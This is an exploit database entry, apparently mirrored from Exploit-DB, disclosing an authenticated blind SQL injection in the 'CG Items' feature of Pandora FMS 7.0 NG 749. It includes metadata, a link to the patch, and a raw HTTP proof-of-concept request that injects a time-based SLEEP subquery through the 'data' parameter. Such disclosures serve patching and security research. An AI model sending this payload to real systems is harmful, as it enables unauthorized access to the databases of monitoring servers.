Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection (Authenticated)

vendor:

Pandora FMS

by:

Matthew Aberegg, Alex Prieto

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: Pandora FMS

Affected Version From: Pandora FMS 7.0 NG 749

Affected Version To: Pandora FMS 7.0 NG 749

Patch Exists: YES

Related CWE: N/A

CPE: a:pandorafms:pandora_fms:7.0_ng_749

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Ubuntu 18.04

2020

Pandora FMS 7.0 NG 749 – ‘CG Items’ SQL Injection (Authenticated)

A blind SQL injection vulnerability exists in the 'CG Items' functionality of Pandora FMS. The vulnerable parameter is 'data'.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection (Authenticated)
# Date: 11-14-2020
# Exploit Author: Matthew Aberegg, Alex Prieto
# Vendor Homepage: https://pandorafms.com/
# Patch Link: https://github.com/pandorafms/pandorafms/commit/1258a1a63535f60924fb69b1f7812c678570cc8e
# Software Link: https://pandorafms.com/community/get-started/
# Version: Pandora FMS 7.0 NG 749
# Tested on: Ubuntu 18.04


# Vulnerability Details
# Description : A blind SQL injection vulnerability exists in the "CG Items" functionality of Pandora FMS.  
# Vulnerable Parameter : data


# POC

POST /pandora_console/ajax.php?data=(SELECT+1+FROM+(SELECT(SLEEP(5)))A) HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 23
Origin: http://TARGET
Connection: close
Referer: http://TARGET/pandora_console/index.php?sec=eventos&sec2=operation/events/events
Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3

page=general%2Fcg_items